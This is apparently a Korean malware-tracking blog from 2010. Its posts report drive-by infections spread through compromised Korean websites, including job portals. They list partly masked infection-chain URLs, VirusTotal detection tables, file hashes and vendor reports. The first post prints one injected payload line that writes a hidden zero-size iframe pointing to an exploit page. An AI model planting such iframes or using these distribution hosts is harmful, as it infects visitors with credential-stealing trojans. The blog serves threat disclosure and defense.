posted by Kwan's 2010. 10. 1. 09:23

세의님의 알라딘 시리즈에 이어서 이에 뒤질세라 평일에 포털사이트인 캐리어도 유포를 시작하였습니다.현재 페이지는 오늘 오후에 변조가 되었음을 확인하였습니다. 그 결과 http://job.XXXX.net 에도 악성링크가 삽입되어서 현재는 취업 사이트인 캐리어와 잡 NEXT에서 유포 되고 있음을 확인 할 수 있습니다 !!

지난주에도 글을 쓸까 말까 하다가 이번에 다시 유포되고 있어서 이렇게 글을 써봅니다. 아무튼 이 사이트 둘은 매우 조심해야 아니 들어가지 말아야합니다 !! 악성코드는 캐리어와 NEXT음에서 유포하고 있습니다. 현재 원인으로써는 먼저 감염된 커리어에 있는거 같습니다. 커리어 http://www.caxxxx.co.kr/js/job_rnd_list.js 에서 job.XXXX.net 으로 유입된거 같습니다.
어쨌든 캐리어는 메인사이트에 들어가는 동시에 JOB NEXT음 은 JOB에 들어가는 동시에 감염이 되는거 같습니다.

[정리]

최초 유포지 : http://www.caxxxx.co.kr/
2차 유포지 : http://job.xxxx.net 
악성코드 아이프레임 삽입 : http://xxxx.xxxx.net/xx/jquery.min.js 
악성코드 연결 JS : http://2xx.143.48.xxx/xx/si.js 
최종파일 연결 : http://2xx.143.48.xxx/xx/si.asp
최종파일 : http://www.sixxx.or.kr/xxot/txxx/down.exe

그중 si.js는 출력에만 접근한다면 쉽게 asp가 나올 수 있습니다.

출력 : document.write("<iframe src= http://2xx.143.48.xxx/xx/si.asp width=0 height=0></iframe>");

[바이러스 토탈]

File name:

si.js

Result:
6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Downloader
AntiVir 7.10.12.92 2010.09.30 -
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 HTML:IFrame-JK
Avast5 5.0.594.0 2010.09.30 HTML:IFrame-JK
AVG 9.0.0.851 2010.09.30 -
BitDefender 7.2 2010.09.30 -
CAT-QuickHeal 11.00 2010.09.30 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.09.30 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7885 2010.09.30 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.09.30 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.09.30 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.09.30 -
NOD32 5493 2010.09.30 -
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 -
Panda 10.0.2.7 2010.09.30 -
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Iframe-Gen
Sunbelt 6952 2010.09.30 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 -
TheHacker 6.7.0.1.041 2010.09.30 -
TrendMicro 9.120.0.1004 2010.09.30 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.09.27 -
ViRobot 2010.8.31.4017 2010.09.30 -
VirusBuster 12.66.8.0 2010.09.30 -
MD5: 82360d68e71cf37ae4400295f1746f08
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de
File size: 424 bytes
Scan date: 2010-10-01 00:13:28 (UTC)

File name:
si.asp
Result:
6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Cve-2010-0806
AntiVir 7.10.12.92 2010.09.30 JS/Small.R
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 JS:Downloader-RN
Avast5 5.0.594.0 2010.09.30 JS:Downloader-RN
AVG 9.0.0.851 2010.09.30 -
BitDefender 7.2 2010.09.30 -
CAT-QuickHeal 11.00 2010.09.30 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.09.30 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7885 2010.09.30 -
F-Prot 4.6.2.117 2010.09.30 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 JS:Downloader-RN
Ikarus T3.1.1.90.0 2010.09.30 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 Riskware
Kaspersky 7.0.0.125 2010.10.01 Exploit.JS.CVE-2010-0806.z
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.09.30 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.6201 2010.09.30 -
NOD32 5493 2010.09.30 -
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 Script-JS/W32.Agent.AEQ
Panda 10.0.2.7 2010.09.30 -
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 Trojan.DL.Script.JS.Agent.qx
Sophos 4.58.0 2010.10.01 Mal/JSBO-Gen
Sunbelt 6952 2010.09.30 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 -
TheHacker 6.7.0.1.041 2010.09.30 -
TrendMicro 9.120.0.1004 2010.09.30 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.09.27 -
ViRobot 2010.8.31.4017 2010.09.30 JS.EX-CVE-2010-0806.5882.B
VirusBuster 12.66.8.0 2010.09.30 -
MD5: 5d9c846e08a768f648080e5d207aeb47
SHA1: f24d4dba37fd16eba993f337dbf357fca94dc533
SHA256: d795c3be4ec899f70b4b6c6c5e6900ef0537001072b92a304319c6f314d09034
File size: 6015 bytes
Scan date: 2010-10-01 00:13:31 (UTC)


File name:
down.exe
Result:
30/ 43 (69.8%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 Win-Trojan/Agent.54272.NF
AntiVir 7.10.12.92 2010.09.30 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 Win32:Malware-gen
Avast5 5.0.594.0 2010.09.30 Win32:Malware-gen
AVG 9.0.0.851 2010.09.30 PSW.Generic8.VIP
BitDefender 7.2 2010.09.30 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
CAT-QuickHeal 11.00 2010.09.30 (Suspicious) - DNAScan
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 Trojan.PWS.Siggen.8181
Emsisoft 5.0.0.50 2010.09.30 Trojan.Win32.Pincav!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7886 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
Ikarus T3.1.1.90.0 2010.09.30 Trojan.Win32.Pincav
Jiangmin 13.0.900 2010.09.30 Trojan/Invader.add
K7AntiVirus 9.63.2648 2010.09.30 Trojan
Kaspersky 7.0.0.125 2010.10.01 Trojan.Win32.Pincav.ahzv
McAfee 5.400.0.1158 2010.10.01 Generic.dx!tzh
McAfee-GW-Edition 2010.1C 2010.09.30 Generic.dx!tzh
Microsoft 1.6201 2010.09.30 PWS:Win32/Magania.BQ
NOD32 5493 2010.09.30 a variant of Win32/PSW.Gamania.NBT
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 -
Panda 10.0.2.7 2010.09.30 Generic Trojan
PCTools 7.0.3.5 2010.10.01 Trojan-PSW.Gampass
Prevx 3.0 2010.10.01 High Risk Cloaked Malware
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Dorf-F
Sunbelt 6952 2010.09.30 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 Infostealer.Gampass
TheHacker 6.7.0.1.041 2010.09.30 Trojan/Pincav.ahzv
TrendMicro 9.120.0.1004 2010.09.30 TROJ_PINCAV.SMXA
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
VBA32 3.12.14.1 2010.09.27 Malware-Cryptor.Inject.gen
ViRobot 2010.8.31.4017 2010.09.30 -
VirusBuster 12.66.8.0 2010.09.30 Trojan.Pincav.IVM
MD5: 18d7b00b5d37587c7456b3c3a1181a69
SHA1: fcb91ed3d3b5e498bf3b4ce508351f3e3c51dab5
SHA256: 960af5ab7b18c06b4e4bb0580265585df20510f025b89300e7f364e800cbfa83
File size: 54272 bytes
Scan date: 2010-10-01 00:19:25 (UTC)

신고업체 : 안철수연구소 이스트 소프트 , 네이버 , 잉카인터넷 

[안철수연구소]

1 si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00) 
2 down.exe ~> V3 : Win-Trojan/Agent.54272.NF(추가 : 2010.10.01.00) 
3 si.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.10.01.00)

이전 게시글

[security/보안 뉴스] - [카스퍼스키] 2010년 8월 악성 프로그램 통계
[security/악성코드 유포] - yahoo.js 의 유포날짜 2차 정리 !!
[security/악성코드 유포] - 아스키 코드로 이루어진 악성 아이프레임 !!

댓글을 달아 주세요

  1. 2010.10.01 11:12  Addr  Edit/Del  Reply

    비밀댓글입니다

posted by Kwan's 2010. 9. 7. 11:03

1. 사이트 !!

씨X통 : http://www.cixxxxng.com
레이XX 클럽 : http://www.rxxexx.co.kr 
옐XX X 택배 : http://www.yeXXXXXX.co.kr
강XX센X : http://www.stXXXXX.or.kr 外 다수
한국XXXXX연합회 : http://www.kXuXXX.or.kr 外 다수
부산XX 外 다수 : http://www.XXXbuXXX.com/

2. 유포지 !!

씨X통 : http://6X.1XX.1.8X/test.asp

레이XX 클럽 : http://2XX.1XX.9X.2X2/V.asp
                    http://2XX.2XX.12X.5X/help.asp

옐XX X XX : http://2XX.2XX.12X.5X/help.asp

강XXXX , 한국XXXXXXX회 外 다수 : http://www.XXiayuaXcom/XX/yahoo.js
                                                              http://www.XXayuaXcom/XX/ad.htm
                                                              http://www.XXayuaXcom/XX/news.html
                                                              http://www.XXayuaXcom/XX/count.html

부산XX 外 다수 : http://XXle.XXangq.co.kr/dXXX/report/sb/index.htm
                        http://XXle.XXangq.co.kr/dXXX/report/sb/6.htm
                        http://XXle.XXangq.co.kr/dXXX/report/sb/ie.jpg
                        http://XXle.XXangq.co.kr/dXXX/report/sb/iee.jpg

3. 최종파일 !!

test.asp , help.asp : http://loXX.XXnbt.info/pXXXX/chong.exe

V.asp : http://XXablade.com/XXder/d.exe

ad.htm : http://www.XXxny.com/image/s.exe

iee.jpg : http://loXX.XXnbt.info/pXXXX/chong.exe

4. 바이러스 토탈

test.asp : http://www.virustotal.com/file-scan/report.html?id=b5d1054496c0f85de2231776787c925d28fcc4e72153d0bc2df5c281e15b4a9c-1283822614

help.asp : http://www.virustotal.com/file-scan/report.html?id=10eb7191ad67287469f44e5db73c463337d154715df5717f57355f7413ddef99-1283822619

V.asp : http://www.virustotal.com/file-scan/report.html?id=b5d1054496c0f85de2231776787c925d28fcc4e72153d0bc2df5c281e15b4a9c-1283823361

yahoo.js : http://www.virustotal.com/file-scan/report.html?id=38fb192a31fc9795d7cd0c8de199c22fd639b85a3fcef6adb3a6c8fa747a84de-1283823366

ad.htm : http://www.virustotal.com/file-scan/report.html?id=71020f01ab7a9c6d44ff720850b08303e3fe8860fa3d6f1c819dd806d08cb832-1283823433

news.html : http://www.virustotal.com/file-scan/report.html?id=dcb0f56c127a107f67d4362472c451dbfb399dabffe673cdbe4204084b32ff7f-1283823445

count.html : http://www.virustotal.com/file-scan/report.html?id=dd04ba376ca8412f26a2d8077ab23c35209cd0e0c03f16fbf2620c36bd2c4370-1283823527

index.htm : http://www.virustotal.com/file-scan/report.html?id=d24618283f09b057665df60c03e5d378c145278deb797ff09f00d15d8f71067c-1283615067

6.htm : http://www.virustotal.com/file-scan/report.html?id=b97bcb2e3e2cd3dab79ca94939e0818865a8f474dce1a45ca1f8bfcf9320769c-1283615053

ie.jpg : http://www.virustotal.com/file-scan/report.html?id=96fd35784055780ef28cd6615c798c0e3d68a9ebb97393a456594b571b55251c-1283615058

iee.jpg : http://www.virustotal.com/file-scan/report.html?id=05d0a7cd5111df398f40b8f31d8d357c38d4a3338f213bc8cb338d6083258ff4-1283615063

pop.exe : http://www.virustotal.com/file-scan/report.html?id=fdade277f556797331f91af8228f19cbb659c4f559d9fe38800008a752ef1e78-1283823544

d.exe : http://www.virustotal.com/file-scan/report.html?id=9be1f0e3a083386396648e20aa4dc066a545453c70afa7ba12e53029f8352e87-1283823684

s.exe : http://www.virustotal.com/file-scan/report.html?id=3ecca9e0be88d46ca8ff5263af7218a6d8fa4fc2fb26a72d8818caafe866b18c-1283823692

chong.exe : http://www.virustotal.com/file-scan/report.html?id=bd1460158f28299155929a498c0bd31e592a0d51ce69d0d3b5df9693d6e96434-1283823807

5. 국내 업체 진단 사항 !!

이스트 소프트 , 네이버 : 분석 및 악성 파일 DB에 추가 예정 !!

[안철수연구소]

1. count.html ~> 분석중
2. chong.exe ~> V3 : Win-Trojan/Downloader.73728.FP(추가 : 2010.09.05.00)
3. d.exe ~> V3 : Dropper/Onlinegamehack.63434(추가 : 2010.09.05.00)
4. help.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.09.05.00)
5. yahoo.js ~> V3 : JS/Iframe(추가 : 2010.09.05.00)
6. ad.htm ~> V3 : JS/Cve-2010-0806(추가 : 2010.09.05.00)
7. news.html ~> V3 : JS/Exploit(추가 : 2010.09.05.00)
8. s.exe ~> V3 : Dropper/Onlinegamehack.40960(추가 : 2010.09.05.00)
9. test.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.09.05.00)
10. V.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.09.05.00)
11. pop.exe ~> V3 : Win-Trojan/Agent.64623(추가 : 2010.09.01.02)

흠.. 이번주에는 yahoo.js가 많이 난리를 쳤더라고요.. 최종파일 위치만 항상 바뀌고 ..
역시 취약점의 끝은 어디인지 ~ 관리가 절실한거 같습니다.
아무튼 태풍도 이번에는 빗겨가고 서울은 화창하고 무덥네요.. 비 한번 쏟아지면 좋은데..
서울에 계신분은 더운데 무더위 잘 보내시고 ~ 지방분들은 태풍에 피해가 없길 바라며 글을 마칩니다.
오늘도 모두 즐거운 하루 보내세요~

댓글을 달아 주세요

posted by Kwan's 2010. 9. 5. 15:18

V3 엔진 업데이트              Copyright (c) AhnLab, Inc. 1998-2010 All rights reserved.

 *  엔진버전: 2010.09.05.00

 1. 다음 악성 코드의 진단/치료 엔진을 업데이트했습니다.

       Win-Trojan/Onlinegamehack.49152.CA 포함 총 12건


 2. 다음 악성 코드의 진단명을 수정했습니다.

 3. 자세한 정보는 아래에서 확인할 수 있습니다.

       http://download.ahnlab.com/eng_info/full_readmek.txt

 4. Win-Trojan/Onlinegamehack.49152.CA
    Win-Trojan/Onlinegamehack.26112.AE
    Dropper/Onlinegamehack.53760.B
    Win-Trojan/Onlinegamehack.45056.BE
    Win-Trojan/Downloader.73728.FP
    Win-Trojan/Onlinegamehack.80658
    Win-Trojan/Onlinegamehack.82944.AF
    Dropper/Onlinegamehack.186858
    Dropper/Onlinegamehack.63434
    Dropper/Onlinegamehack.40960
    Win-Trojan/Onlinegamehack.86016.BZ
    Dropper/Rshot.86203

[내 신고 목록]

1 ad.htm ~> V3 : JS/Cve-2010-0806(추가 : 2010.09.05.00)
2 news.html ~> V3 : JS/Exploit(추가 : 2010.09.05.00)
3 test.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.09.05.00)
4 s.exe ~> V3 : Dropper/Onlinegamehack.40960(추가 : 2010.09.05.00)
5 help.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.09.05.00)
6 yahoo.js ~> V3 : JS/Iframe(추가 : 2010.09.05.00)


댓글을 달아 주세요